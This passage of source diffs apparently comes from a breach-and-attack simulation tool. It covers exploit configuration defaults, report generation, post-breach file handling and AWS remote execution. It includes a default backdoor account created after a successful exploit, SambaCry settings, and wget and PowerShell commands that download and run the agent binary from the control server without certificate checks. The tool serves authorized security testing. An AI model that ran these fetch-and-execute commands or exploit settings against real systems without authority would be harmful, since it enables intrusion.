||||||
|
"user_to_add": {
|
||||||
|
"title": "Remote user",
|
||||||
|
"type": "string",
|
||||||
|
"default": "Monkey_IUSER_SUPPORT",
|
||||||
|
"description": "Username to add on successful exploit"
|
||||||
|
},
|
||||||
|
"remote_user_pass": {
|
||||||
|
"title": "Remote user password",
|
||||||
|
"type": "string",
|
||||||
|
"default": "Password1!",
|
||||||
|
"description": "Password to use for created user"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"rdp_grinder": {
|
||||||
|
"title": "RDP grinder",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"rdp_use_vbs_download": {
|
||||||
|
"title": "Use VBS download",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether to use VBS or BITS to download monkey to remote machine"
|
||||||
|
" (true=VBS, false=BITS)"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"sambacry": {
|
||||||
|
"title": "SambaCry",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"sambacry_trigger_timeout": {
|
||||||
|
"title": "SambaCry trigger timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 5,
|
||||||
|
"description": "Timeout (in seconds) of SambaCry trigger"
|
||||||
|
},
|
||||||
|
"sambacry_folder_paths_to_guess": {
|
||||||
|
"title": "SambaCry folder paths to guess",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
'/',
|
||||||
|
'/mnt',
|
||||||
|
'/tmp',
|
||||||
|
'/storage',
|
||||||
|
'/export',
|
||||||
|
'/share',
|
||||||
|
'/shares',
|
||||||
|
'/home'
|
||||||
|
],
|
||||||
|
"description": "List of full paths to share folder for SambaCry to guess"
|
||||||
|
},
|
||||||
|
"sambacry_shares_not_to_check": {
|
||||||
|
"title": "SambaCry shares not to check",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"IPC$", "print$"
|
||||||
|
],
|
||||||
|
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"smb_service": {
|
||||||
|
"title": "SMB service",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"smb_download_timeout": {
|
||||||
|
"title": "SMB download timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 300,
|
||||||
|
"description":
|
||||||
|
"Timeout (in seconds) for SMB download operation (used in various exploits using SMB)"
|
||||||
|
},
|
||||||
|
"smb_service_name": {
|
||||||
|
"title": "SMB service name",
|
||||||
|
"type": "string",
|
||||||
|
"default": "InfectionMonkey",
|
||||||
|
"description": "Name of the SMB service that will be set up to download monkey"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"network": {
|
||||||
|
"title": "Network",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"tcp_scanner": {
|
||||||
|
"title": "TCP scanner",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"HTTP_PORTS": {
|
||||||
|
"title": "HTTP ports",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "integer"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
80,
|
||||||
|
8080,
|
||||||
|
443,
|
||||||
|
8008,
|
||||||
|
7001
|
||||||
|
],
|
||||||
|
"description": "List of ports the monkey will check if are being used for HTTP"
|
||||||
|
},
|
||||||
|
"tcp_target_ports": {
|
||||||
|
"title": "TCP target ports",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "integer"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
22,
|
||||||
|
2222,
|
||||||
|
445,
|
||||||
|
135,
|
||||||
|
3389,
|
||||||
|
80,
|
||||||
|
8080,
|
||||||
|
443,
|
||||||
|
8008,
|
||||||
|
3306,
|
||||||
|
9200,
|
||||||
|
7001
|
||||||
|
],
|
||||||
|
"description": "List of TCP ports the monkey will check whether they're open"
|
||||||
|
},
|
||||||
|
"tcp_scan_interval": {
|
||||||
|
"title": "TCP scan interval",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 0,
|
||||||
|
"description": "Time to sleep (in milliseconds) between scans"
|
||||||
|
},
|
||||||
|
"tcp_scan_timeout": {
|
||||||
|
"title": "TCP scan timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 3000,
|
||||||
|
"description": "Maximum time (in milliseconds) to wait for TCP response"
|
||||||
|
},
|
||||||
|
"tcp_scan_get_banner": {
|
||||||
|
"title": "TCP scan - get banner",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether the TCP scan should try to get the banner"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"ping_scanner": {
|
||||||
|
"title": "Ping scanner",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"ping_scan_timeout": {
|
||||||
|
"title": "Ping scan timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 1000,
|
||||||
|
"description": "Maximum time (in milliseconds) to wait for ping response"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"options": {
|
||||||
|
"collapsed": True
|
||||||
|
}
|
||||||
|
}
|
|
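The block above is a JSON-Schema-style definition that the Island's UI renders into the configuration form. As a rough, standalone illustration only (not the Island's actual code path), a fragment such as the ping scanner block can be checked with the third-party jsonschema package; the schema and values below are trimmed stand-ins.

# Illustrative only: validating a config fragment against a JSON-Schema-style
# definition like the one above, using the third-party `jsonschema` package.
from jsonschema import validate, ValidationError

ping_scanner_schema = {
    "type": "object",
    "properties": {
        "ping_scan_timeout": {"type": "integer", "default": 1000}
    }
}

try:
    # A well-formed fragment passes silently; a wrong type raises ValidationError.
    validate(instance={"ping_scan_timeout": 1000}, schema=ping_scanner_schema)
    print("config fragment is valid")
except ValidationError as e:
    print("invalid config: %s" % e.message)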
@@ -6,6 +6,7 @@ import cc.services.log
 from cc.database import mongo
 from cc.services.edge import EdgeService
 from cc.utils import local_ip_addresses
+import socket

 __author__ = "itay.mizeretz"

@@ -41,6 +42,7 @@ class NodeService:
         # node is uninfected
         new_node = NodeService.node_to_net_node(node, for_report)
         new_node["ip_addresses"] = node["ip_addresses"]
+        new_node["domain_name"] = node["domain_name"]

         for edge in edges:
             accessible_from_nodes.append(NodeService.get_monkey_label(NodeService.get_monkey_by_id(edge["from"])))
@@ -62,7 +64,10 @@ class NodeService:

     @staticmethod
     def get_node_label(node):
-        return node["os"]["version"] + " : " + node["ip_addresses"][0]
+        domain_name = ""
+        if node["domain_name"]:
+            domain_name = " ("+node["domain_name"]+")"
+        return node["os"]["version"] + " : " + node["ip_addresses"][0] + domain_name

     @staticmethod
     def _cmp_exploits_by_timestamp(exploit_1, exploit_2):
@@ -137,6 +142,8 @@ class NodeService:
             "group": NodeService.get_monkey_group(monkey),
             "os": NodeService.get_monkey_os(monkey),
             "dead": monkey["dead"],
+            "domain_name": "",
+            "pba_results": monkey["pba_results"] if "pba_results" in monkey else []
         }

     @staticmethod
@@ -176,10 +183,11 @@ class NodeService:
                 upsert=False)

     @staticmethod
-    def insert_node(ip_address):
+    def insert_node(ip_address, domain_name=''):
         new_node_insert_result = mongo.db.node.insert_one(
             {
                 "ip_addresses": [ip_address],
+                "domain_name": domain_name,
                 "exploited": False,
                 "creds": [],
                 "os":
@@ -191,10 +199,10 @@ class NodeService:
         return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id})

     @staticmethod
-    def get_or_create_node(ip_address):
+    def get_or_create_node(ip_address, domain_name=''):
         new_node = mongo.db.node.find_one({"ip_addresses": ip_address})
         if new_node is None:
-            new_node = NodeService.insert_node(ip_address)
+            new_node = NodeService.insert_node(ip_address, domain_name)
         return new_node

     @staticmethod
@@ -261,6 +269,7 @@ class NodeService:
     def get_monkey_island_node():
         island_node = NodeService.get_monkey_island_pseudo_net_node()
         island_node["ip_addresses"] = local_ip_addresses()
+        island_node["domain_name"] = socket.gethostname()
         return island_node

     @staticmethod
@@ -294,6 +303,10 @@ class NodeService:
     def is_monkey_finished_running():
         return NodeService.is_any_monkey_exists() and not NodeService.is_any_monkey_alive()

+    @staticmethod
+    def get_latest_modified_monkey():
+        return mongo.db.monkey.find({}).sort('modifytime', -1).limit(1)
+
     @staticmethod
     def add_credentials_to_monkey(monkey_id, creds):
         mongo.db.monkey.update(
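With the change above, get_node_label appends the node's domain name, when one is known, in parentheses after the OS version and first IP address. A small self-contained sketch of the resulting label format, using made-up node data:

# Rough illustration of the label format produced by the new get_node_label
# (the sample node data below is invented for the example).
def node_label(node):
    domain_name = ""
    if node["domain_name"]:
        domain_name = " (" + node["domain_name"] + ")"
    return node["os"]["version"] + " : " + node["ip_addresses"][0] + domain_name

print(node_label({"os": {"version": "Ubuntu-16.04"},
                  "ip_addresses": ["10.0.0.7"],
                  "domain_name": "host.example.local"}))
# -> Ubuntu-16.04 : 10.0.0.7 (host.example.local)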
@@ -0,0 +1,43 @@
import cc.services.config
import logging
import os

__author__ = "VakarisZ"

logger = logging.getLogger(__name__)

# Where to find file names in config
PBA_WINDOWS_FILENAME_PATH = ['monkey', 'behaviour', 'PBA_windows_filename']
PBA_LINUX_FILENAME_PATH = ['monkey', 'behaviour', 'PBA_linux_filename']
UPLOADS_DIR = 'monkey_island/cc/userUploads'


def remove_PBA_files():
    if cc.services.config.ConfigService.get_config():
        windows_filename = cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH)
        linux_filename = cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH)
        if linux_filename:
            remove_file(linux_filename)
        if windows_filename:
            remove_file(windows_filename)


def remove_file(file_name):
    file_path = os.path.join(UPLOADS_DIR, file_name)
    try:
        if os.path.exists(file_path):
            os.remove(file_path)
    except OSError as e:
        logger.error("Can't remove previously uploaded post breach files: %s" % e)


def set_config_PBA_files(config_json):
    """
    Sets PBA file info in config_json to current config's PBA file info values.
    :param config_json: config_json that will be modified
    """
    if cc.services.config.ConfigService.get_config():
        linux_filename = cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH)
        windows_filename = cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH)
        config_json['monkey']['behaviour']['PBA_linux_filename'] = linux_filename
        config_json['monkey']['behaviour']['PBA_windows_filename'] = windows_filename
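The helpers above address post-breach-action files in the configuration by path lists such as PBA_WINDOWS_FILENAME_PATH. As a hedged, standalone sketch of how such a path list can be resolved against a nested config dict (a stand-in for ConfigService.get_config_value, whose real implementation is not shown here):

# Stand-in illustration of resolving a config path list against a nested dict.
from functools import reduce

def get_config_value(config, path):
    # Walk the nested dict one key at a time; raises KeyError if the path is absent.
    return reduce(lambda node, key: node[key], path, config)

sample_config = {'monkey': {'behaviour': {'PBA_windows_filename': 'run.bat'}}}
print(get_config_value(sample_config, ['monkey', 'behaviour', 'PBA_windows_filename']))  # run.bat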
@@ -0,0 +1,138 @@
from cc.services.config import ConfigService
from common.cloud.aws_instance import AwsInstance
from common.cloud.aws_service import AwsService
from common.cmd.aws.aws_cmd_runner import AwsCmdRunner
from common.cmd.cmd import Cmd
from common.cmd.cmd_runner import CmdRunner

__author__ = "itay.mizeretz"


class RemoteRunAwsService:
    aws_instance = None
    is_auth = False

    def __init__(self):
        pass

    @staticmethod
    def init():
        """
        Initializes service. Subsequent calls to this function have no effect.
        Must be called at least once (in entire monkey lifetime) before usage of functions
        :return: None
        """
        if RemoteRunAwsService.aws_instance is None:
            RemoteRunAwsService.aws_instance = AwsInstance()

    @staticmethod
    def run_aws_monkeys(instances, island_ip):
        """
        Runs monkeys on the given instances
        :param instances: List of instances to run on
        :param island_ip: IP of island the monkey will communicate with
        :return: Dictionary with instance ids as keys, and True/False as values if succeeded or not
        """
        instances_bitness = RemoteRunAwsService.get_bitness(instances)
        return CmdRunner.run_multiple_commands(
            instances,
            lambda instance: RemoteRunAwsService.run_aws_monkey_cmd_async(
                instance['instance_id'], RemoteRunAwsService._is_linux(instance['os']), island_ip,
                instances_bitness[instance['instance_id']]),
            lambda _, result: result.is_success)

    @staticmethod
    def is_running_on_aws():
        return RemoteRunAwsService.aws_instance.is_aws_instance()

    @staticmethod
    def update_aws_auth_params():
        """
        Updates the AWS authentication parameters according to config
        :return: True if new params allow successful authentication. False otherwise
        """
        access_key_id = ConfigService.get_config_value(['cnc', 'aws_config', 'aws_access_key_id'], False, True)
        secret_access_key = ConfigService.get_config_value(['cnc', 'aws_config', 'aws_secret_access_key'], False, True)

        if (access_key_id != AwsService.access_key_id) or (secret_access_key != AwsService.secret_access_key):
            AwsService.set_auth_params(access_key_id, secret_access_key)
            RemoteRunAwsService.is_auth = AwsService.test_client()

        AwsService.set_region(RemoteRunAwsService.aws_instance.region)

        return RemoteRunAwsService.is_auth

    @staticmethod
    def get_bitness(instances):
        """
        For all given instances, checks whether they're 32 or 64 bit.
        :param instances: List of instances to check
        :return: Dictionary with instance ids as keys, and True/False as values. True if 64bit, False otherwise
        """
        return CmdRunner.run_multiple_commands(
            instances,
            lambda instance: RemoteRunAwsService.run_aws_bitness_cmd_async(
                instance['instance_id'], RemoteRunAwsService._is_linux(instance['os'])),
            lambda instance, result: RemoteRunAwsService._get_bitness_by_result(
                RemoteRunAwsService._is_linux(instance['os']), result))

    @staticmethod
    def _get_bitness_by_result(is_linux, result):
        if not result.is_success:
            return None
        elif is_linux:
            return result.stdout.find('i686') == -1  # i686 means 32bit
        else:
            return result.stdout.lower().find('programfiles(x86)') != -1  # if not found it means 32bit

    @staticmethod
    def run_aws_bitness_cmd_async(instance_id, is_linux):
        """
        Runs an AWS command to check bitness
        :param instance_id: Instance ID of target
        :param is_linux: Whether target is linux
        :return: Cmd
        """
        cmd_text = 'uname -m' if is_linux else 'Get-ChildItem Env:'
        return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text)

    @staticmethod
    def run_aws_monkey_cmd_async(instance_id, is_linux, island_ip, is_64bit):
        """
        Runs a monkey remotely using AWS
        :param instance_id: Instance ID of target
        :param is_linux: Whether target is linux
        :param island_ip: IP of the island which the instance will try to connect to
        :param is_64bit: Whether the instance is 64bit
        :return: Cmd
        """
        cmd_text = RemoteRunAwsService._get_run_monkey_cmd_line(is_linux, is_64bit, island_ip)
        return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text)

    @staticmethod
    def run_aws_cmd_async(instance_id, is_linux, cmd_line):
        cmd_runner = AwsCmdRunner(is_linux, instance_id)
        return Cmd(cmd_runner, cmd_runner.run_command_async(cmd_line))

    @staticmethod
    def _is_linux(os):
        return 'linux' == os

    @staticmethod
    def _get_run_monkey_cmd_linux_line(bit_text, island_ip):
        return r'wget --no-check-certificate https://' + island_ip + r':5000/api/monkey/download/monkey-linux-' + \
               bit_text + r'; chmod +x monkey-linux-' + bit_text + r'; ./monkey-linux-' + bit_text + r' m0nk3y -s ' + \
               island_ip + r':5000'

    @staticmethod
    def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
        return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \
               r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \
               r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \
               r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "

    @staticmethod
    def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):
        bit_text = '64' if is_64bit else '32'
        return RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip) if is_linux \
            else RemoteRunAwsService._get_run_monkey_cmd_windows_line(bit_text, island_ip)
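A minimal usage sketch for the service above, assuming the Island runs on an AWS instance, credentials are set under cnc/aws_config, and the targets can be reached through AWS command execution; the instance data and IP below are made up for the example.

# Hedged usage sketch of RemoteRunAwsService (sample values are placeholders).
RemoteRunAwsService.init()
if RemoteRunAwsService.update_aws_auth_params():
    instances = [{'instance_id': 'i-0123456789abcdef0', 'os': 'linux'}]
    results = RemoteRunAwsService.run_aws_monkeys(instances, '10.0.0.1')
    # results maps instance id -> True/False, depending on whether the run command succeeded
    print(results)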
@@ -3,11 +3,14 @@ import functools

 import ipaddress
 import logging
+
+from bson import json_util
 from enum import Enum

 from six import text_type

 from cc.database import mongo
+from cc.report_exporter_manager import ReportExporterManager
 from cc.services.config import ConfigService
 from cc.services.edge import EdgeService
 from cc.services.node import NodeService
@@ -37,7 +40,8 @@ class ReportService:
         'ShellShockExploiter': 'ShellShock Exploiter',
         'Struts2Exploiter': 'Struts2 Exploiter',
         'WebLogicExploiter': 'Oracle WebLogic Exploiter',
-        'HadoopExploiter': 'Hadoop/Yarn Exploiter'
+        'HadoopExploiter': 'Hadoop/Yarn Exploiter',
+        'MSSQLExploiter': 'MSSQL Exploiter'
     }

     class ISSUES_DICT(Enum):
@@ -52,7 +56,8 @@ class ReportService:
         STRUTS2 = 8
         WEBLOGIC = 9
         HADOOP = 10
-        PTH_CRIT_SERVICES_ACCESS = 11
+        PTH_CRIT_SERVICES_ACCESS = 11,
+        MSSQL = 12

     class WARNINGS_DICT(Enum):
         CROSS_SEGMENT = 0
@@ -123,10 +128,12 @@ class ReportService:
                     'label': node['label'],
                     'ip_addresses': node['ip_addresses'],
                     'accessible_from_nodes':
-                        (x['hostname'] for x in
+                        list((x['hostname'] for x in
                          (NodeService.get_displayed_node_by_id(edge['from'], True)
-                          for edge in EdgeService.get_displayed_edges_by_to(node['id'], True))),
-                    'services': node['services']
+                          for edge in EdgeService.get_displayed_edges_by_to(node['id'], True)))),
+                    'services': node['services'],
+                    'domain_name': node['domain_name'],
+                    'pba_results': node['pba_results'] if 'pba_results' in node else 'None'
                 })

         logger.info('Scanned nodes generated for reporting')
@@ -146,6 +153,7 @@ class ReportService:
             {
                 'label': monkey['label'],
                 'ip_addresses': monkey['ip_addresses'],
+                'domain_name': monkey['domain_name'],
                 'exploits': list(set(
                     [ReportService.EXPLOIT_DISPLAY_DICT[exploit['exploiter']] for exploit in monkey['exploits'] if
                      exploit['result']]))
@@ -326,6 +334,12 @@ class ReportService:
         processed_exploit['type'] = 'hadoop'
         return processed_exploit

+    @staticmethod
+    def process_mssql_exploit(exploit):
+        processed_exploit = ReportService.process_general_exploit(exploit)
+        processed_exploit['type'] = 'mssql'
+        return processed_exploit
+
     @staticmethod
     def process_exploit(exploit):
         exploiter_type = exploit['data']['exploiter']
@@ -340,7 +354,8 @@ class ReportService:
             'ShellShockExploiter': ReportService.process_shellshock_exploit,
             'Struts2Exploiter': ReportService.process_struts2_exploit,
             'WebLogicExploiter': ReportService.process_weblogic_exploit,
-            'HadoopExploiter': ReportService.process_hadoop_exploit
+            'HadoopExploiter': ReportService.process_hadoop_exploit,
+            'MSSQLExploiter': ReportService.process_mssql_exploit
         }

         return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@@ -540,12 +555,24 @@ class ReportService:
         for issue in issues:
             if not issue.get('is_local', True):
                 machine = issue.get('machine').upper()
+                aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
                 if machine not in domain_issues_dict:
                     domain_issues_dict[machine] = []
+                if aws_instance_id:
+                    issue['aws_instance_id'] = aws_instance_id
                 domain_issues_dict[machine].append(issue)
         logger.info('Domain issues generated for reporting')
         return domain_issues_dict

+    @staticmethod
+    def get_machine_aws_instance_id(hostname):
+        aws_instance_id_list = list(mongo.db.monkey.find({'hostname': hostname}, {'aws_instance_id': 1}))
+        if aws_instance_id_list:
+            if 'aws_instance_id' in aws_instance_id_list[0]:
+                return str(aws_instance_id_list[0]['aws_instance_id'])
+        else:
+            return None
+
     @staticmethod
     def get_issues():
         ISSUE_GENERATORS = [
@@ -556,14 +583,18 @@ class ReportService:
             PTHReportService.get_duplicated_passwords_issues,
             PTHReportService.get_strong_users_on_crit_issues
         ]

         issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])

         issues_dict = {}
         for issue in issues:
             if issue.get('is_local', True):
                 machine = issue.get('machine').upper()
+                aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
                 if machine not in issues_dict:
                     issues_dict[machine] = []
+                if aws_instance_id:
+                    issue['aws_instance_id'] = aws_instance_id
                 issues_dict[machine].append(issue)
         logger.info('Issues generated for reporting')
         return issues_dict
@@ -625,6 +656,8 @@ class ReportService:
             issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
         elif issue['type'] == 'weblogic':
             issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
+        elif issue['type'] == 'mssql':
+            issues_byte_array[ReportService.ISSUES_DICT.MSSQL.value] = True
         elif issue['type'] == 'hadoop':
             issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
         elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
@@ -659,26 +692,17 @@ class ReportService:

     @staticmethod
     def is_report_generated():
-        generated_report = mongo.db.report.find_one({'name': 'generated_report'})
-        if generated_report is None:
-            return False
-        return generated_report['value']
+        generated_report = mongo.db.report.find_one({})
+        return generated_report is not None

     @staticmethod
-    def set_report_generated():
-        mongo.db.report.update(
-            {'name': 'generated_report'},
-            {'$set': {'value': True}},
-            upsert=True)
-        logger.info("Report marked as generated.")
-
-    @staticmethod
-    def get_report():
+    def generate_report():
         domain_issues = ReportService.get_domain_issues()
         issues = ReportService.get_issues()
         config_users = ReportService.get_config_users()
         config_passwords = ReportService.get_config_passwords()
         cross_segment_issues = ReportService.get_cross_segment_issues()
+        monkey_latest_modify_time = list(NodeService.get_latest_modified_monkey())[0]['modifytime']

         report = \
             {
@@ -710,15 +734,59 @@ class ReportService:
             {
                 'issues': issues,
                 'domain_issues': domain_issues
+            },
+            'meta':
+            {
+                'latest_monkey_modifytime': monkey_latest_modify_time
             }
         }
+        ReportExporterManager().export(report)
-        finished_run = NodeService.is_monkey_finished_running()
-        if finished_run:
-            ReportService.set_report_generated()
+        mongo.db.report.drop()
+        mongo.db.report.insert_one(ReportService.encode_dot_char_before_mongo_insert(report))

         return report

+    @staticmethod
+    def encode_dot_char_before_mongo_insert(report_dict):
+        """
+        mongodb doesn't allow for '.' and '$' in a key's name, this function replaces the '.' char with the
+        ',,,' combo instead.
+        :return: dict with formatted keys with no dots.
+        """
+        report_as_json = json_util.dumps(report_dict).replace('.', ',,,')
+        return json_util.loads(report_as_json)
+
+    @staticmethod
+    def is_latest_report_exists():
+        """
+        This function checks if a monkey report was already generated and if it's the latest one.
+        :return: True if report is the latest one, False if there isn't a report or it's not the latest.
+        """
+        latest_report_doc = mongo.db.report.find_one({}, {'meta.latest_monkey_modifytime': 1})

+        if latest_report_doc:
+            report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime']
+            latest_monkey_modifytime = NodeService.get_latest_modified_monkey()[0]['modifytime']
+            return report_latest_modifytime == latest_monkey_modifytime

+        return False

+    @staticmethod
+    def decode_dot_char_before_mongo_insert(report_dict):
+        """
+        this function replaces the ',,,' combo with the '.' char instead.
+        :return: report dict with formatted keys (',,,' -> '.')
+        """
+        report_as_json = json_util.dumps(report_dict).replace(',,,', '.')
+        return json_util.loads(report_as_json)

+    @staticmethod
+    def get_report():
+        if ReportService.is_latest_report_exists():
+            return ReportService.decode_dot_char_before_mongo_insert(mongo.db.report.find_one())
+        return ReportService.generate_report()

     @staticmethod
     def did_exploit_type_succeed(exploit_type):
         return mongo.db.edge.count(
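A quick round trip through the dot-encoding helpers defined in the hunk above: MongoDB rejects '.' in key names, so keys are stored with the ',,,' substitute and decoded when the report is read back. The sample document is illustrative.

# Illustration of the encode/decode helpers above (sample data only).
doc = {'192.168.1.1': {'risk': 'high'}}
encoded = ReportService.encode_dot_char_before_mongo_insert(doc)
assert list(encoded.keys()) == ['192,,,168,,,1,,,1']
decoded = ReportService.decode_dot_char_before_mongo_insert(encoded)
assert decoded == doc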
@@ -13,11 +13,18 @@ class WMIHandler(object):
         self.monkey_id = monkey_id
         self.info_for_mongo = {}
         self.users_secrets = user_secrets
-        self.users_info = wmi_info['Win32_UserAccount']
-        self.groups_info = wmi_info['Win32_Group']
-        self.groups_and_users = wmi_info['Win32_GroupUser']
-        self.services = wmi_info['Win32_Service']
-        self.products = wmi_info['Win32_Product']
+        if not wmi_info:
+            self.users_info = ""
+            self.groups_info = ""
+            self.groups_and_users = ""
+            self.services = ""
+            self.products = ""
+        else:
+            self.users_info = wmi_info['Win32_UserAccount']
+            self.groups_info = wmi_info['Win32_Group']
+            self.groups_and_users = wmi_info['Win32_GroupUser']
+            self.services = wmi_info['Win32_Service']
+            self.products = wmi_info['Win32_Product']

     def process_and_handle_wmi_info(self):

@@ -25,7 +32,8 @@ class WMIHandler(object):
         self.add_users_to_collection()
         self.create_group_user_connection()
         self.insert_info_to_mongo()
-        self.add_admin(self.info_for_mongo[self.ADMINISTRATORS_GROUP_KNOWN_SID], self.monkey_id)
+        if self.info_for_mongo:
+            self.add_admin(self.info_for_mongo[self.ADMINISTRATORS_GROUP_KNOWN_SID], self.monkey_id)
         self.update_admins_retrospective()
         self.update_critical_services()
File diff suppressed because it is too large
@@ -68,6 +68,7 @@
     "core-js": "^2.5.7",
     "downloadjs": "^1.4.7",
     "fetch": "^1.1.0",
+    "filepond": "^4.2.0",
     "js-file-download": "^0.4.4",
     "json-loader": "^0.5.7",
     "jwt-decode": "^2.2.0",
@@ -83,6 +84,7 @@
     "react-dimensions": "^1.3.0",
     "react-dom": "^16.5.2",
     "react-fa": "^5.0.0",
+    "react-filepond": "^7.0.1",
     "react-graph-vis": "^1.0.2",
     "react-json-tree": "^0.11.0",
     "react-jsonschema-form": "^1.0.5",
@@ -90,6 +92,7 @@
     "react-router-dom": "^4.3.1",
     "react-table": "^6.8.6",
     "react-toggle": "^4.0.1",
-    "redux": "^4.0.0"
+    "redux": "^4.0.0",
+    "sha3": "^2.0.0"
   }
 }
@@ -6,6 +6,7 @@ class AuthComponent extends React.Component {
     super(props);
     this.auth = new AuthService();
     this.authFetch = this.auth.authFetch;
+    this.jwtHeader = this.auth.jwtHeader();
   }
 }

@@ -27,31 +27,44 @@ let guardicoreLogoImage = require('../images/guardicore-logo.png');

 class AppComponent extends AuthComponent {
   updateStatus = () => {
-    if (this.auth.loggedIn()){
-      this.authFetch('/api')
-        .then(res => res.json())
-        .then(res => {
-          // This check is used to prevent unnecessary re-rendering
-          let isChanged = false;
-          for (let step in this.state.completedSteps) {
-            if (this.state.completedSteps[step] !== res['completed_steps'][step]) {
-              isChanged = true;
-              break;
-            }
-          }
-          if (isChanged) {
-            this.setState({completedSteps: res['completed_steps']});
-          }
-        });
-    }
+    this.auth.loggedIn()
+      .then(res => {
+        if (this.state.isLoggedIn !== res) {
+          this.setState({
+            isLoggedIn: res
+          });
+        }
+
+        if (res) {
+          this.authFetch('/api')
+            .then(res => res.json())
+            .then(res => {
+              // This check is used to prevent unnecessary re-rendering
+              let isChanged = false;
+              for (let step in this.state.completedSteps) {
+                if (this.state.completedSteps[step] !== res['completed_steps'][step]) {
+                  isChanged = true;
+                  break;
+                }
+              }
+              if (isChanged) {
+                this.setState({completedSteps: res['completed_steps']});
+              }
+            });
+        }
+      });
   };

   renderRoute = (route_path, page_component, is_exact_path = false) => {
     let render_func = (props) => {
-      if (this.auth.loggedIn()) {
-        return page_component;
-      } else {
-        return <Redirect to={{pathname: '/login'}}/>;
+      switch (this.state.isLoggedIn) {
+        case true:
+          return page_component;
+        case false:
+          return <Redirect to={{pathname: '/login'}}/>;
+        default:
+          return page_component;
+
       }
     };

@@ -65,15 +78,22 @@ class AppComponent extends AuthComponent {
   constructor(props) {
     super(props);
     this.state = {
+      removePBAfiles: false,
       completedSteps: {
         run_server: true,
         run_monkey: false,
         infection_done: false,
-        report_done: false
+        report_done: false,
+        isLoggedIn: undefined
       }
     };
   }

+  // Sets the property that indicates if we need to remove PBA files from state or not
+  setRemovePBAfiles = (rmFiles) => {
+    this.setState({removePBAfiles: rmFiles});
+  };
+
   componentDidMount() {
     this.updateStatus();
     this.interval = setInterval(this.updateStatus, 5000);
@@ -3,15 +3,43 @@ import Form from 'react-jsonschema-form';
 import {Col, Nav, NavItem} from 'react-bootstrap';
 import fileDownload from 'js-file-download';
 import AuthComponent from '../AuthComponent';
+import { FilePond } from 'react-filepond';
+import 'filepond/dist/filepond.min.css';

 class ConfigurePageComponent extends AuthComponent {
   constructor(props) {
     super(props);
+    this.PBAwindowsPond = null;
+    this.PBAlinuxPond = null;
     this.currentSection = 'basic';
     this.currentFormData = {};
     this.sectionsOrder = ['basic', 'basic_network', 'monkey', 'cnc', 'network', 'exploits', 'internal'];
+    this.uiSchema = {
+      behaviour: {
+        custom_PBA_linux_cmd: {
+          "ui:widget": "textarea",
+          "ui:emptyValue": ""
+        },
+        PBA_linux_file: {
+          "ui:widget": this.PBAlinux
+        },
+        custom_PBA_windows_cmd: {
+          "ui:widget": "textarea",
+          "ui:emptyValue": ""
+        },
+        PBA_windows_file: {
+          "ui:widget": this.PBAwindows
+        },
+        PBA_linux_filename: {
+          classNames: "linux-pba-file-info",
+          "ui:emptyValue": ""
+        },
+        PBA_windows_filename: {
+          classNames: "windows-pba-file-info",
+          "ui:emptyValue": ""
